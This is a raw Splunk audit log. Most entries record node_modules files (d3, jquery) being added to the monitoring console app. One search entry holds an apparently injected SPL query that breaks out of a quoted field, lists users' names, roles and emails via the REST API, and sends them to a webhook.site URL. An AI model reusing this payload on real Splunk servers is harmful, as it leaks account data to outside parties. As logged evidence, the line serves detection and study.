action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/visualizations/heatmap/node_modules/d3/src/arrays/values.js", isdir=0, size=113, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:06.488, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/visualizations/heatmap/node_modules/d3/src/arrays/transpose.js", isdir=0, size=373, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:06.484, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/visualizations/heatmap/node_modules/d3/src/arrays/sum.js", isdir=0, size=346, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:06.478, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/visualizations/heatmap/node_modules/d3/src/arrays/shuffle.js", isdir=0, size=283, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:06.472, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/visualizations/heatmap/node_modules/d3/src/arrays/set.js", isdir=0, size=557, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:06.466, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/visualizations/heatmap/node_modules/d3/src/arrays/range.js", isdir=0, size=641, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:06.460, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/visualizations/heatmap/node_modules/d3/src/arrays/quantile.js", isdir=0, size=239, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:06.456, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/visualizations/heatmap/node_modules/d3/src/arrays/permute.js", isdir=0, size=160, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:06.451, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/visualizations/heatmap/node_modules/d3/src/arrays/pairs.js", isdir=0, size=191, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:06.446, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/visualizations/heatmap/node_modules/d3/src/arrays/nest.js", isdir=0, size=2116, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:06.441, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/visualizations/heatmap/node_modules/d3/src/arrays/min.js", isdir=0, size=464, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:06.437, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/visualizations/heatmap/node_modules/d3/src/arrays/merge.js", isdir=0, size=336, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:06.433, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/visualizations/heatmap/node_modules/d3/src/arrays/median.js", isdir=0, size=464, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:06.428, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/visualizations/heatmap/node_modules/d3/src/arrays/mean.js", isdir=0, size=379, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:06.422, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/visualizations/heatmap/node_modules/d3/src/arrays/max.js", isdir=0, size=464, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:06.416, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/visualizations/heatmap/node_modules/d3/src/arrays/map.js", isdir=0, size=1974, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:06.411, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/visualizations/heatmap/node_modules/d3/src/arrays/keys.js", isdir=0, size=100, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:06.406, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/visualizations/heatmap/node_modules/d3/src/arrays/index.js", isdir=0, size=418, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:06.401, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/visualizations/heatmap/node_modules/d3/src/arrays/extent.js", isdir=0, size=569, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:06.394, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/visualizations/heatmap/node_modules/d3/src/arrays/entries.js", isdir=0, size=136, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:06.389, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/visualizations/heatmap/node_modules/d3/src/arrays/deviation.js", isdir=0, size=128, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:06.383, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/visualizations/heatmap/node_modules/d3/src/arrays/descending.js", isdir=0, size=88, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:06.379, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/visualizations/heatmap/node_modules/d3/src/arrays/bisect.js", isdir=0, size=898, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:06.371, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/visualizations/heatmap/node_modules/d3/src/arrays/ascending.js", isdir=0, size=114, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:06.303, user=user, action=search, info=bad_request, search_id='1665078120.4', has_error_warn=true, fully_completed_search=true, total_run_time=0.00, event_count=0, result_count=0, available_count=0, scan_count=0, drop_count=0, exec_time=1665078120, api_et=1664989200.000000000, api_lt=1665078120.000000000, api_index_et=N/A, api_index_lt=N/A, search_et=N/A, search_lt=N/A, is_realtime=0, savedsearch_name="", search_startup_time="0", is_prjob=false, app="search", provenance="UI:Search", mode="historical", is_proxied=false, searched_buckets=0, eliminated_buckets=0, considered_events=0, total_slices=0, decompressed_slices=0, duration.command.search.index=0, invocations.command.search.index.bucketcache.hit=0, duration.command.search.index.bucketcache.hit=0, invocations.command.search.index.bucketcache.miss=0, duration.command.search.index.bucketcache.miss=0, invocations.command.search.index.bucketcache.error=0, duration.command.search.rawdata=0, invocations.command.search.rawdata.bucketcache.hit=0, duration.command.search.rawdata.bucketcache.hit=0, invocations.command.search.rawdata.bucketcache.miss=0, duration.command.search.rawdata.bucketcache.miss=0, invocations.command.search.rawdata.bucketcache.error=0, roles='user', search='| mstats avg('fake') WHERE "index\"=eee [| rest /services/authentication/users | table realname, title, roles, email | sendalert webhook param.url=https://webhook.site/62ffc09d-d887-4d9b-8c9a-74ccb1b4d15b]" "demo"=qwe'] Audit:[timestamp=10-06-2022 17:42:06.161, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/visualizations/heatmap/node_modules/d3/src/svg/symbol.js", isdir=0, size=2405, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:06.157, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/visualizations/heatmap/node_modules/d3/src/svg/svg.js", isdir=0, size=13, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:06.153, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/visualizations/heatmap/node_modules/d3/src/svg/line.js", isdir=0, size=12044, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:06.148, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/visualizations/heatmap/node_modules/d3/src/svg/line-radial.js", isdir=0, size=532, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:06.143, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/visualizations/heatmap/node_modules/d3/src/svg/index.js", isdir=0, size=211, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:06.138, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/visualizations/heatmap/node_modules/d3/src/svg/diagonal.js", isdir=0, size=985, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:06.134, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/visualizations/heatmap/node_modules/d3/src/svg/diagonal-radial.js", isdir=0, size=652, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:06.130, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/visualizations/heatmap/node_modules/d3/src/svg/chord.js", isdir=0, size=2067, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:06.125, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/visualizations/heatmap/node_modules/d3/src/svg/brush.js", isdir=0, size=13119, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:06.118, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/visualizations/heatmap/node_modules/d3/src/svg/axis.js", isdir=0, size=5400, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:06.112, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/visualizations/heatmap/node_modules/d3/src/svg/area.js", isdir=0, size=2820, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:06.107, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/visualizations/heatmap/node_modules/d3/src/svg/area-radial.js", isdir=0, size=406, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:06.103, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/visualizations/heatmap/node_modules/d3/src/svg/arc.js", isdir=0, size=8887, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:05.998, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/visualizations/heatmap/node_modules/d3/src/compat/style.js", isdir=0, size=987, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:05.993, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/visualizations/heatmap/node_modules/d3/src/compat/index.js", isdir=0, size=47, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:05.986, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/visualizations/heatmap/node_modules/d3/src/compat/date.js", isdir=0, size=62, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:05.981, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/visualizations/heatmap/node_modules/d3/src/compat/array.js", isdir=0, size=391, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:05.875, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/visualizations/heatmap/node_modules/d3/src/xhr", isdir=1, size=4096, gid=41812, uid=41812, modtime="Sat May 1 18:45:21 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:42:05.871, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/visualizations/heatmap/node_modules/d3/src/transition", isdir=1, size=4096, gid=41812, uid=41812, modtime="Sat May 1 18:45:21 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:42:05.868, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/visualizations/heatmap/node_modules/d3/src/time", isdir=1, size=4096, gid=41812, uid=41812, modtime="Sat May 1 18:45:21 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:42:05.863, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/visualizations/heatmap/node_modules/d3/src/svg", isdir=1, size=4096, gid=41812, uid=41812, modtime="Sat May 1 18:45:21 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:42:05.859, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/visualizations/heatmap/node_modules/d3/src/start.js", isdir=0, size=55, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:05.854, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/visualizations/heatmap/node_modules/d3/src/selection", isdir=1, size=4096, gid=41812, uid=41812, modtime="Sat May 1 18:45:21 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:42:05.850, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/visualizations/heatmap/node_modules/d3/src/scale", isdir=1, size=4096, gid=41812, uid=41812, modtime="Sat May 1 18:45:21 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:42:05.845, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/visualizations/heatmap/node_modules/d3/src/math", isdir=1, size=4096, gid=41812, uid=41812, modtime="Sat May 1 18:45:21 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:42:05.840, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/visualizations/heatmap/node_modules/d3/src/locale", isdir=1, size=4096, gid=41812, uid=41812, modtime="Sat May 1 18:45:21 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:42:05.834, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/visualizations/heatmap/node_modules/d3/src/layout", isdir=1, size=4096, gid=41812, uid=41812, modtime="Sat May 1 18:45:21 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:42:05.830, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/visualizations/heatmap/node_modules/d3/src/interpolate", isdir=1, size=4096, gid=41812, uid=41812, modtime="Sat May 1 18:45:21 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:42:05.825, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/visualizations/heatmap/node_modules/d3/src/geom", isdir=1, size=4096, gid=41812, uid=41812, modtime="Sat May 1 18:45:21 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:42:05.819, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/visualizations/heatmap/node_modules/d3/src/geo", isdir=1, size=4096, gid=41812, uid=41812, modtime="Sat May 1 18:45:21 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:42:05.814, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/visualizations/heatmap/node_modules/d3/src/format", isdir=1, size=4096, gid=41812, uid=41812, modtime="Sat May 1 18:45:21 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:42:05.809, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/visualizations/heatmap/node_modules/d3/src/event", isdir=1, size=4096, gid=41812, uid=41812, modtime="Sat May 1 18:45:21 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:42:05.804, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/visualizations/heatmap/node_modules/d3/src/end.js", isdir=0, size=180, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:05.799, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/visualizations/heatmap/node_modules/d3/src/dsv", isdir=1, size=4096, gid=41812, uid=41812, modtime="Sat May 1 18:45:21 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:42:05.795, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/visualizations/heatmap/node_modules/d3/src/d3.js", isdir=0, size=365, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:05.791, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/visualizations/heatmap/node_modules/d3/src/core", isdir=1, size=4096, gid=41812, uid=41812, modtime="Sat May 1 18:45:21 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:42:05.786, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/visualizations/heatmap/node_modules/d3/src/compat", isdir=1, size=4096, gid=41812, uid=41812, modtime="Sat May 1 18:45:21 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:42:05.781, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/visualizations/heatmap/node_modules/d3/src/color", isdir=1, size=4096, gid=41812, uid=41812, modtime="Sat May 1 18:45:21 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:42:05.777, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/visualizations/heatmap/node_modules/d3/src/behavior", isdir=1, size=4096, gid=41812, uid=41812, modtime="Sat May 1 18:45:21 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:42:05.773, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/visualizations/heatmap/node_modules/d3/src/arrays", isdir=1, size=4096, gid=41812, uid=41812, modtime="Sat May 1 18:45:21 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:42:05.566, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/visualizations/heatmap/node_modules/d3/bin/uglify", isdir=0, size=890, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:05.560, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/visualizations/heatmap/node_modules/d3/bin/start", isdir=0, size=143, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:05.553, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/visualizations/heatmap/node_modules/d3/bin/meteor", isdir=0, size=576, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:05.548, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/visualizations/heatmap/node_modules/d3/src", isdir=1, size=4096, gid=41812, uid=41812, modtime="Sat May 1 18:45:21 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:42:05.543, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/visualizations/heatmap/node_modules/d3/package.json", isdir=0, size=2923, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:05.539, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/visualizations/heatmap/node_modules/d3/package.js", isdir=0, size=366, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:05.532, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/visualizations/heatmap/node_modules/d3/d3.min.js", isdir=0, size=151725, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:05.526, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/visualizations/heatmap/node_modules/d3/d3.js", isdir=0, size=337945, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:05.518, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/visualizations/heatmap/node_modules/d3/composer.json", isdir=0, size=614, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:05.512, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/visualizations/heatmap/node_modules/d3/bin", isdir=1, size=4096, gid=41812, uid=41812, modtime="Sat May 1 18:45:21 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:42:05.506, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/visualizations/heatmap/node_modules/d3/README.md", isdir=0, size=949, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:05.498, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/visualizations/heatmap/node_modules/d3/LICENSE", isdir=0, size=1429, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:05.492, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/visualizations/heatmap/node_modules/d3/CONTRIBUTING.md", isdir=0, size=2794, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:05.484, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/visualizations/heatmap/node_modules/d3/.spmignore", isdir=0, size=17, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:05.479, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/visualizations/heatmap/node_modules/d3/.npmignore", isdir=0, size=44, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:05.474, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/visualizations/heatmap/node_modules/d3/.gitattributes", isdir=0, size=50, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:05.369, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/visualizations/heatmap/node_modules/jquery/src/traversing/var/siblings.js", isdir=0, size=218, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:05.365, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/visualizations/heatmap/node_modules/jquery/src/traversing/var/rneedsContext.js", isdir=0, size=128, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:05.357, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/visualizations/heatmap/node_modules/jquery/src/traversing/var/dir.js", isdir=0, size=371, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:05.353, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/visualizations/heatmap/node_modules/jquery/src/traversing/var", isdir=1, size=4096, gid=41812, uid=41812, modtime="Sat May 1 18:45:21 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:42:05.349, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/visualizations/heatmap/node_modules/jquery/src/traversing/findFilter.js", isdir=0, size=2352, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:05.245, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/visualizations/heatmap/node_modules/jquery/src/manipulation/var/rtagName.js", isdir=0, size=304, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:05.240, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/visualizations/heatmap/node_modules/jquery/src/manipulation/var/rscriptType.js", isdir=0, size=92, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:05.236, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/visualizations/heatmap/node_modules/jquery/src/manipulation/wrapMap.js", isdir=0, size=819, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:05.232, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/visualizations/heatmap/node_modules/jquery/src/manipulation/var", isdir=1, size=4096, gid=41812, uid=41812, modtime="Sat May 1 18:45:21 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:42:05.228, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/visualizations/heatmap/node_modules/jquery/src/manipulation/support.js", isdir=0, size=1236, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:05.225, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/visualizations/heatmap/node_modules/jquery/src/manipulation/setGlobalEval.js", isdir=0, size=381, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:05.221, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/visualizations/heatmap/node_modules/jquery/src/manipulation/getAll.js", isdir=0, size=650, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:05.217, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/visualizations/heatmap/node_modules/jquery/src/manipulation/buildFragment.js", isdir=0, size=2486, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:05.213, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/visualizations/heatmap/node_modules/jquery/src/manipulation/_evalUrl.js", isdir=0, size=686, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:05.209, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/visualizations/heatmap/node_modules/jquery/src/core/var/rsingleTag.js", isdir=0, size=244, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:05.205, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/visualizations/heatmap/node_modules/jquery/src/core/var", isdir=1, size=4096, gid=41812, uid=41812, modtime="Sat May 1 18:45:21 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:42:05.199, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/visualizations/heatmap/node_modules/jquery/src/core/toType.js", isdir=0, size=379, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", 